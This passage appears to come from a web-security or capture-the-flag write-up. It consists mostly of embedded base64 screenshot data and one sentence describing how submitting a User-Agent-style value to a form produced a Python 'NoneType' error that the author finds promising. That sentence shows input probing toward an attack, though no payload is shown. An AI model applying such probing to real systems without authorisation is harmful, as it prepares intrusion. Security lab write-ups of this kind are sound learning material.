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) If we type in `SomeUserAgent` into the field and click submit, we get the python error message `NoneType object is not subscriptable` which is already promising. ![](data:image/png;base64,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